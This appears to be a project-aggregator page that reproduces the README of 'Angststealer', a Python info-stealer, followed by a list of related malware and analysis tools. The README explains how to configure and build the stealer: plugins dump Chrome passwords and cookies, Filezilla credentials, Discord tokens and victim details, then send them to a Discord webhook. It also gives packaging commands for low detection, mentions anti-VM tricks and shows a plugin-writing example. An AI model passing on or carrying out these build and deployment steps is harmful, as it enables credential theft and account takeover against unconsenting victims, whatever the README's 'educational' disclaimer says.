All Projects → backslash → Angststealer

backslash / Angststealer

Licence: mit
Angst is the first python malware to have its own plugin system allowing for quick and easy account takeover. Along with its ability for easy plugin integration it has incredibly low detections.

Programming Languages

python
139335 projects - #7 most used programming language

Labels

Projects that are alternatives of or similar to Angststealer

Lime Rat
LimeRAT | Simple, yet powerful remote administration tool for Windows (RAT)
Stars: ✭ 663 (+1406.82%)
Mutual labels:  malware
Brutus
A Python-powered exploitation framework and botnet.
Stars: ✭ 17 (-61.36%)
Mutual labels:  malware
Malware Ioc
Indicators of Compromises (IOC) of our various investigations
Stars: ✭ 955 (+2070.45%)
Mutual labels:  malware
Hblock
Improve your security and privacy by blocking ads, tracking and malware domains.
Stars: ✭ 724 (+1545.45%)
Mutual labels:  malware
Threatpursuit Vm
Threat Pursuit Virtual Machine (VM): A fully customizable, open-sourced Windows-based distribution focused on threat intelligence analysis and hunting designed for intel and malware analysts as well as threat hunters to get up and running quickly.
Stars: ✭ 814 (+1750%)
Mutual labels:  malware
Thezoo
A repository of LIVE malwares for your own joy and pleasure. theZoo is a project created to make the possibility of malware analysis open and available to the public.
Stars: ✭ 7,849 (+17738.64%)
Mutual labels:  malware
Cyberchef Recipes
A list of cyber-chef recipes and curated links
Stars: ✭ 619 (+1306.82%)
Mutual labels:  malware
Norimaci
Norimaci is a simple and lightweight malware analysis sandbox for macOS
Stars: ✭ 37 (-15.91%)
Mutual labels:  malware
Unencrypted Backdoor With Process Cloaking
Unencrypted backdoor
Stars: ✭ 16 (-63.64%)
Mutual labels:  malware
Virustotal Tools
Submits multiple domains to VirusTotal API
Stars: ✭ 29 (-34.09%)
Mutual labels:  malware
Diamorphine
LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x (x86/x86_64 and ARM64)
Stars: ✭ 725 (+1547.73%)
Mutual labels:  malware
Yargen
yarGen is a generator for YARA rules
Stars: ✭ 795 (+1706.82%)
Mutual labels:  malware
Blocklistsaggregator
A Python tool that downloads IP block lists from various sources and builds configurations for network equipments and firewalls.
Stars: ✭ 20 (-54.55%)
Mutual labels:  malware
Manalyze
A static analyzer for PE executables.
Stars: ✭ 701 (+1493.18%)
Mutual labels:  malware
Wordpress Wp Vcd Malware Attack Solution
Another attack on wordpress 4.8
Stars: ✭ 31 (-29.55%)
Mutual labels:  malware
Fame
FAME Automates Malware Evaluation
Stars: ✭ 663 (+1406.82%)
Mutual labels:  malware
Malware Samples
A collection of malware samples caught by several honeypots i manage
Stars: ✭ 863 (+1861.36%)
Mutual labels:  malware
Malcom
Malcom - Malware Communications Analyzer
Stars: ✭ 988 (+2145.45%)
Mutual labels:  malware
Spytrojan keylogger
[Solo para programadores] Troyano espía | Keylogger solo para Windows, se replica en el sistema y se inicia automaticamente al iniciar sesión. | Envío de registro mediante [Base de Datos], [Gmail] o [BotTelegram].
Stars: ✭ 32 (-27.27%)
Mutual labels:  malware
Njrat 0.7d Stub Csharp
njRAT C# Stub - Fixed For PowerShell
Stars: ✭ 28 (-36.36%)
Mutual labels:  malware

Angst Stealer

AngstStealer is a POC malware which is designed to highlight and utilize Discord as an attack vector. While it is fully functioning it was created for educational purpose's, please do not use misuse this tool. Angst Stealer currently has a total of 6 plugins:

Plugin Description
Chrome The chrome plugin dumps all of the users passwords, websites, and usernames.
Filezilla Checks to see if the user has Filezilla installed, if they do then it dumps stored Filezilla creds.
Cookies Dumps chrome cookies.
Discord Dumps discord token for Chrome and Discord.
Send Zips and sends all the files through the Discord webhook.
User Drops userdata about the victim such as IP, Username and Computername.
Windows Also drops the windows activation key for the victims computer.

Setup

  1. Install python here
  2. Clone this repo using git clone https://github.com/backslash/AngstStealer or manually download it.
  3. Run cd folderpath so that you are inside the directory itself.
  4. Install the required libraries using pip install -r requirements.txt
  5. Inside the main file you will see a config template, modify it so it matches your requirements.
CONFIG = {
    "webhook" : "",
    "software": {
        "chrome" : True,
        "chromecookies": True,
        "filezilla": True,
        "discord": True,
        "screenshot": True,
        "windows": True
    }
}

webhook -> The discord webhook link which you want it to use. chrome -> If it should include chrome passwords filezilla -> Should it include possible saved filezilla passwords windows -> Give information about your victim & includes the windows key discord -> Steal discord tokens screenshot -> takes a screenshot 6. Run one of the following commands listed below, it is worth noting that pyarmor will sometimes corrupt the executable so if you plan on using the pyarmor command you should test it locally to make sure it works. PYINSTALLER: pyinstaller --onefile --hidden-import=pkg_resources.py2_warn angst.py PYARMOR: pyarmor pack -e " --onefile --hidden-import=pkg_resources.py2_warn" angst.py

To Do List

  • [x] Add cookie support (just got lazy and forgot)
  • [ ] Add more browsers
  • [x] Implement some anti-vm tricks.
  • [ ] Add more plugins

Adding Plugins

Adding custom plugins is incredibly easy, here is a short example of how you make and integrate your own custom plugin for Angst:

  1. First off you will want to create your plugin preferably in your plugins folder. The plugin can have as many function as needed, the example I provided below has one function called retrieve_data which will retrieve our sensitive data. Our dump function is needed for proper plugin integration because this is how all the functions know to dump there data.
import requests

class ExamplePlugin(object):
	def __init__(self):
		self.sensitive_data = ""

	def retrieve_data(self):
		view_website = requests.get("https://api.ipify.org")
		self.sensitve_data = view_website.text

	def dump(self):
		self.retrieve_data()
		return self.sensitive_data
	
  1. Next we want to add our example function to our main file which is angst.py in our angst.py do from plugins.exampleplugin import ExamplePlugin change your import name on whatever you named your file and whatever you called the plugin class.
  2. Lastly we want to add it to our config["software"] and the self.plugins as show below.
    "software": {
        "chrome" : True,
        "chromecookies": True,
        "filezilla": True,
        "discord": True,
        "screenshot": True,
        "windows": True
    }
self.plugins = {
            "chrome": Chrome(),
            "chromecookies": Cookies(),
            "filezilla": Filezilla(),
            "discord": Discord(),
            "screenshot": Screenshot(),
            "windows": Windows()
        }

Make sure you use the exact same name when you put it under the config and self.plugins since it is case sensitive.

Additional

Use this responsibly, I made this just as a demonstration of a POC. The fact that Discord still hasn't implemented any safegaurds or preventive measures when it comes to something like this is kind've embarrasing. Regardless though, using this without the consent of the computer owner is illegal.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].